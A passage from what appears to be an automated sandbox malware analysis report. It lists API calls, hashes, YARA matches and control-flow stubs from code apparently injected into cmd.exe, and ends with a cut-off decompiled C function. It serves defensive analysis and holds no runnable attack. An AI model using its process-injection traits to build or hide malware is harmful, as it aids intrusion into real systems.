                                                    • Instruction Fuzzy Hash: 2C1190B2200109ABCB18DF8DDC91DEB73ADAF8C754B158249BA1D93241D630E8118BB4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 265 d85f0-d8641 call d91f0 NtCreateFile
                                                    APIs
                                                    • NtCreateFile.NTDLL(00000060,00000000,.z`,000D3BC7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,000D3BC7,007A002E,00000000,00000060,00000000,00000000), ref: 000D863D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_c0000_cmd.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID: .z`
                                                    • API String ID: 823142352-1441809116
                                                    • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                    • Instruction ID: a305089da097ed719c72aed8d9c7693924ca7dab2b5e5cbbb371ccdd09c44f6a
                                                    • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                    • Instruction Fuzzy Hash: ECF0BDB2200208ABCB08CF88DC85EEB77ADAF8C754F158248BA0D97241C630E811CBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 268 d86a0-d86e9 call d91f0 NtReadFile
                                                    APIs
                                                    • NtReadFile.NTDLL(000D3D82,5E972F65,FFFFFFFF,?,?,?,000D3D82,?,A:,FFFFFFFF,5E972F65,000D3D82,?,00000000), ref: 000D86E5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_c0000_cmd.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID: A:
                                                    • API String ID: 2738559852-3573652513
                                                    • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                    • Instruction ID: cc444391a9b4fa47d756e1aa691be51edd04e1dc01baa2c9c15e2ee8584cfa22
                                                    • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                    • Instruction Fuzzy Hash: CDF0A4B6200209ABCB14DF89DC85EEB77ADAF8C754F158249BE1D97241D630E811CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 271 d8642-d864d 272 d864f 271->272 273 d860b-d8641 NtCreateFile 271->273
                                                    APIs
                                                    • NtCreateFile.NTDLL(00000060,00000000,.z`,000D3BC7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,000D3BC7,007A002E,00000000,00000060,00000000,00000000), ref: 000D863D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_c0000_cmd.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID: .z`
                                                    • API String ID: 823142352-1441809116
                                                    • Opcode ID: be5f7221360a20a6c443f830ae1769a090a9f8139e61cb02de094cd56315abc9
                                                    • Instruction ID: 40bdf968a00312cf02a06084196dc3c8f9177077ce2f2f47a5adaaffbb2f5bc4
                                                    • Opcode Fuzzy Hash: be5f7221360a20a6c443f830ae1769a090a9f8139e61cb02de094cd56315abc9
                                                    • Instruction Fuzzy Hash: 63F0FEB2605144AFDB05CF98D981CDB77BDAF8C750715864DF94DD7205D634E801CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 280 d871a-d8749 call d91f0 NtClose
                                                    APIs
                                                    • NtClose.NTDLL(`=,?,?,000D3D60,00000000,FFFFFFFF), ref: 000D8745
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_c0000_cmd.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Close
                                                    • String ID: `=
                                                    • API String ID: 3535843008-2748261937
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 283 d8720-d8736 284 d873c-d8749 NtClose 283->284 285 d8737 call d91f0 283->285 285->284
                                                    APIs
                                                    • NtClose.NTDLL(`=,?,?,000D3D60,00000000,FFFFFFFF), ref: 000D8745
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_c0000_cmd.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Close
                                                    • String ID: `=
                                                    • API String ID: 3535843008-2748261937
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.687168638.00000000021E0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: true
                                                    • Associated: 00000007.00000002.687160698.00000000021D0000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687257958.00000000022C0000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687263498.00000000022D0000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687269113.00000000022D4000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687274473.00000000022D7000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687279694.00000000022E0000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687321106.0000000002340000.00000040.00000001.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_21d0000_cmd.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.687168638.00000000021E0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: true
                                                    • Associated: 00000007.00000002.687160698.00000000021D0000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687257958.00000000022C0000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687263498.00000000022D0000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687269113.00000000022D4000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687274473.00000000022D7000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687279694.00000000022E0000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687321106.0000000002340000.00000040.00000001.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_21d0000_cmd.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.687168638.00000000021E0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: true
                                                    • Associated: 00000007.00000002.687160698.00000000021D0000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687257958.00000000022C0000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687263498.00000000022D0000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687269113.00000000022D4000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687274473.00000000022D7000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687279694.00000000022E0000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687321106.0000000002340000.00000040.00000001.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_21d0000_cmd.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.687168638.00000000021E0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: true
                                                    • Associated: 00000007.00000002.687160698.00000000021D0000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687257958.00000000022C0000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687263498.00000000022D0000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687269113.00000000022D4000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687274473.00000000022D7000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687279694.00000000022E0000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687321106.0000000002340000.00000040.00000001.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_21d0000_cmd.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.687168638.00000000021E0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: true
                                                    • Associated: 00000007.00000002.687160698.00000000021D0000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687257958.00000000022C0000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687263498.00000000022D0000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687269113.00000000022D4000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687274473.00000000022D7000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687279694.00000000022E0000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687321106.0000000002340000.00000040.00000001.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_21d0000_cmd.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.687168638.00000000021E0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: true
                                                    • Associated: 00000007.00000002.687160698.00000000021D0000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687257958.00000000022C0000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687263498.00000000022D0000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687269113.00000000022D4000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687274473.00000000022D7000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687279694.00000000022E0000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687321106.0000000002340000.00000040.00000001.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_21d0000_cmd.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.687168638.00000000021E0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: true
                                                    • Associated: 00000007.00000002.687160698.00000000021D0000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687257958.00000000022C0000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687263498.00000000022D0000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687269113.00000000022D4000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687274473.00000000022D7000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687279694.00000000022E0000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687321106.0000000002340000.00000040.00000001.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_21d0000_cmd.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.687168638.00000000021E0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: true
                                                    • Associated: 00000007.00000002.687160698.00000000021D0000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687257958.00000000022C0000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687263498.00000000022D0000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687269113.00000000022D4000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687274473.00000000022D7000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687279694.00000000022E0000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687321106.0000000002340000.00000040.00000001.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_21d0000_cmd.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.687168638.00000000021E0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: true
                                                    • Associated: 00000007.00000002.687160698.00000000021D0000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687257958.00000000022C0000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687263498.00000000022D0000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687269113.00000000022D4000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687274473.00000000022D7000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687279694.00000000022E0000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687321106.0000000002340000.00000040.00000001.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_21d0000_cmd.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.687168638.00000000021E0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: true
                                                    • Associated: 00000007.00000002.687160698.00000000021D0000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687257958.00000000022C0000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687263498.00000000022D0000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687269113.00000000022D4000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687274473.00000000022D7000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687279694.00000000022E0000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687321106.0000000002340000.00000040.00000001.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_21d0000_cmd.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.687168638.00000000021E0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: true
                                                    • Associated: 00000007.00000002.687160698.00000000021D0000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687257958.00000000022C0000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687263498.00000000022D0000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687269113.00000000022D4000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687274473.00000000022D7000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687279694.00000000022E0000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687321106.0000000002340000.00000040.00000001.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_21d0000_cmd.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.687168638.00000000021E0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: true
                                                    • Associated: 00000007.00000002.687160698.00000000021D0000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687257958.00000000022C0000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687263498.00000000022D0000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687269113.00000000022D4000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687274473.00000000022D7000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687279694.00000000022E0000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687321106.0000000002340000.00000040.00000001.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_21d0000_cmd.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.687168638.00000000021E0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_21d0000_cmd.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                     [Control-flow graph image not recoverable: basic blocks d7310-d7432, with calls to da040, da110, c9b50, d3e60, d6f40, d7140 and Sleep]
                                                    APIs
                                                    • Sleep.KERNELBASE(000007D0), ref: 000D73B8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_c0000_cmd.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Sleep
                                                    • String ID: net.dll$wininet.dll
                                                    • API String ID: 3472027048-1269752229
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                     [Control-flow graph image not recoverable: basic blocks d730e-d7432, with calls to da040, da110, c9b50, d3e60, d6f40, d7140 and Sleep]
                                                    APIs
                                                    • Sleep.KERNELBASE(000007D0), ref: 000D73B8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_c0000_cmd.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Sleep
                                                    • String ID: net.dll$wininet.dll
                                                    • API String ID: 3472027048-1269752229
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                     [Control-flow graph image not recoverable: basic blocks d88f4-d8931, with calls to d91f0 and RtlFreeHeap]
                                                    APIs
                                                    • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,000C3B93), ref: 000D892D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_c0000_cmd.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FreeHeap
                                                    • String ID: .z`
                                                    • API String ID: 3298025750-1441809116
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                     [Control-flow graph image not recoverable: basic blocks d8900-d8931, with calls to d91f0 and RtlFreeHeap]
                                                    APIs
                                                    • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,000C3B93), ref: 000D892D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_c0000_cmd.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FreeHeap
                                                    • String ID: .z`
                                                    • API String ID: 3298025750-1441809116
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                     [Control-flow graph image not recoverable: basic blocks c7290-c7312, with calls to da160, dad40, c9b50, d3e60, c92b0 and two calls to PostThreadMessageW]
                                                    APIs
                                                    • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 000C72EA
                                                    • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 000C730B
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_c0000_cmd.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: MessagePostThread
                                                    • String ID:
                                                    • API String ID: 1836367815-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,000CCFD2,000CCFD2,?,00000000,?,?), ref: 000D8A90
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_c0000_cmd.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 000C9BC2
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_c0000_cmd.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Load
                                                    • String ID:
                                                    • API String ID: 2234796835-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,000CCD00,?,?), ref: 000D747C
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_c0000_cmd.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateThread
                                                    • String ID:
                                                    • API String ID: 2422867632-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,000CCD00,?,?), ref: 000D747C
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_c0000_cmd.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateThread
                                                    • String ID:
                                                    • API String ID: 2422867632-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,000CCFD2,000CCFD2,?,00000000,?,?), ref: 000D8A90
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_c0000_cmd.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetErrorMode.KERNELBASE(00008003,?,?,000C7C93,?), ref: 000CD46B
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_c0000_cmd.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorMode
                                                    • String ID:
                                                    • API String ID: 2340568224-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetErrorMode.KERNELBASE(00008003,?,?,000C7C93,?), ref: 000CD46B
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_c0000_cmd.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorMode
                                                    • String ID:
                                                    • API String ID: 2340568224-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    C-Code - Quality: 94%
                                                    			E02218788(signed int __ecx, void* __edx, signed int _a4) {
                                                    				signed int _v8;
                                                    				short* _v12;
                                                    				void* _v16;
                                                    				signed int _v20;
                                                    				char _v24;
                                                    				signed int _v28;
                                                    				signed int _v32;
                                                    				char _v36;
                                                    				signed int _v40;
                                                    				char _v44;
                                                    				signed int _v48;
                                                    				signed int _v52;
                                                    				signed int _v56;
                                                    				signed int _v60;
                                                    				char _v68;
                                                    				void* _t216;
                                                    				intOrPtr _t231;
                                                    				short* _t235;
                                                    				intOrPtr _t257;
                                                    				short* _t261;
                                                    				intOrPtr _t284;
                                                    				intOrPtr _t288;
                                                    				void* _t314;
                                                    				signed int _t318;
                                                    				short* _t319;
                                                    				intOrPtr _t321;
                                                    				void* _t328;
                                                    				void* _t329;
                                                    				char* _t332;
                                                    				signed int _t333;
                                                    				signed int* _t334;
                                                    				void* _t335;
                                                    				void* _t338;
                                                    				void* _t339;
                                                    
                                                    				_t328 = __edx;
                                                    				_t322 = __ecx;
                                                    				_t318 = 0;
                                                    				_t334 = _a4;
                                                    				_v8 = 0;
                                                    				_v28 = 0;
                                                    				_v48 = 0;
                                                    				_v20 = 0;
                                                    				_v40 = 0;
                                                    				_v32 = 0;
                                                    				_v52 = 0;
                                                    				if(_t334 == 0) {
                                                    					_t329 = 0xc000000d;
                                                    					L49:
                                                    					_t334[0x11] = _v56;
                                                    					 *_t334 =  *_t334 | 0x00000800;
                                                    					_t334[0x12] = _v60;
                                                    					_t334[0x13] = _v28;
                                                    					_t334[0x17] = _v20;
                                                    					_t334[0x16] = _v48;
                                                    					_t334[0x18] = _v40;
                                                    					_t334[0x14] = _v32;
                                                    					_t334[0x15] = _v52;
                                                    					return _t329;
                                                    				}
                                                    				_v56 = 0;
                                                    				if(E02218460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
                                                    					_v56 = 1;
                                                    					if(_v8 != 0) {
                                                    						_t207 = E021FE025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                    					}
                                                    					_push(1);
                                                    					_v8 = _t318;
                                                    					E0221718A(_t207);
                                                    					_t335 = _t335 + 4;
                                                    				}
                                                    				_v60 = _v60 | 0xffffffff;
                                                    				if(E02218460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
                                                    					_t333 =  *_v8;
                                                    					_v60 = _t333;
                                                    					_t314 = E021FE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                    					_push(_t333);
                                                    					_v8 = _t318;
                                                    					E0221718A(_t314);
                                                    					_t335 = _t335 + 4;
                                                    				}
                                                    				_t216 = E02218460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
                                                    				_t332 = ";";
                                                    				if(_t216 < 0) {
                                                    					L17:
                                                    					if(E02218460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
                                                    						L30:
                                                    						if(E02218460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
                                                    							L46:
                                                    							_t329 = 0;
                                                    							L47:
